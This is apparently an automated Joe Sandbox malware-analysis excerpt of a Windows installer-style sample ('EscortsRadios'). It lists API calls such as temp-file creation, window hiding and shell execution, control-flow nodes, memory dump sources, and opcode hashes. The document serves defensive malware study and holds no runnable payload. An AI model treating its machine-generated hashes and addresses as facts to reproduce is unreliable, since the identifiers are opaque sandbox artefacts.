                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                  • API String ID: 3156913733-2180253247
                                                  • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                  • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 893 405e7f-405e8b 894 405e8c-405ec0 GetTickCount GetTempFileNameW 893->894 895 405ec2-405ec4 894->895 896 405ecf-405ed1 894->896 895->894 898 405ec6 895->898 897 405ec9-405ecc 896->897 898->897
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 899 402175-40218b call 401446 * 2 904 402198-40219d 899->904 905 40218d-402197 call 4062a3 899->905 907 4021aa-4021b0 EnableWindow 904->907 908 40219f-4021a5 ShowWindow 904->908 905->904 909 4030e3-4030f2 907->909 908->909
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                  • String ID: HideWindow
                                                  • API String ID: 1249568736-780306582
                                                  • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                  • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                  APIs
                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID:
                                                  • API String ID: 3394109436-0
                                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                  APIs
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                  • String ID:
                                                  • API String ID: 4115351271-0
                                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                  APIs
                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                  • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                  • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                  • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
